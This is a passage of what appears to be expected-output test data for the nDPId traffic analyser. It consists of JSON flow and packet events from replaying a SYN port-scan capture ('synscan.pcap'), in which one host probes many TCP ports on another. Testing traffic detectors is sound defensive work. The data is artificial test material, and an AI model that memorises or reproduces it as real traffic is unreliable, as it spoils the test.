-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsxRsAADcGTFesEAAIQA2GNIzSBCPdUoMYAAAAAGACEAAkbAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsOP4AADQG23SsEAAIQA2GNIzSCizdUoMYAAAAAGACBAAqYwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsP6EAACcG4dGsEAAIQA2GNIzSxUTdUoMYAAAAAGACEABjSgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAslXMAACkGif+sEAAIQA2GNIzSEVvdUoMYAAAAAGACCAAfNAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfHcAACsGoPusEAAIQA2GNIzSB2zdUoMYAAAAAGACEAAhIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMoAADgG76isEAAIQA2GNIzSBHHdUoMYAAAAAGACBAAwHgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsI7sAADYG7resEAAIQA2GNIzSI3ndUoMYAAAAAGACDAAJFgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAseE4AACgGqCSsEAAIQA2GNIzSFqrdUoMYAAAAAGACBAAd5QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsC6AAAC8GDdOsEAAIQA2GNIzSTVndUoMYAAAAAGACEADbNQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+4AADAGNISsEAAIQA2GNIzSBaPdUoMYAAAAAGACBAAu7AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDsAACwGvDesEAAIQA2GNIzSgA\/dUoMYAAAAAGACBAC0fwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsO94AADgG1JSsEAAIQA2GNIzTGiHdU4MZAAAAAGACBAAaawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsafYAAC8Gr3ysEAAIQA2GNIzTD4PdU4MZAAAAAGACEAAZCQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NEAAC8GHKGsEAAIQA2GNIzTwAbdU4MZAAAAAGACEABohQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YEAACUGUfGsEAAIQA2GNIzTRrXdU4MZAAAAAGACCADp1gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsJvQAACcG+n6sEAAIQA2GNIzT\/KjdU4MZAAAAAGACEAAr4wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsu4wAADEGW+asEAAIQA2GNIzTB9ndU4MZAAAAAGACCAAoswAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsomcAADMGcwusEAAIQA2GNIzTAsHdU4MZAAAAAGACEAAlywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsV\/gAADMGvXqsEAAIQA2GNIzTBKLdU4MZAAAAAGACEAAj6gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAszxkAACsGTlmsEAAIQA2GNIzTbindU4MZAAAAAGACEAC6YgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsqCgAACgGeEqsEAAIQA2GNIzTG1rdU4MZAAAAAGACBAAZMgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsXyMAACgGwU+sEAAIQA2GNIzTbEPdU4MZAAAAAGACBADISAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsoekAADkGbYmsEAAIQA2GNIzTBBbdU4MZAAAAAGACCAAsdgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsYoQAACsGuu6sEAAIQA2GNIzTAAHdU4MZAAAAAGACEAAoiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/nEAACkGIQGsEAAIQA2GNIzTJR7dU4MZAAAAAGACCAALbgAAAgQFtA=="} 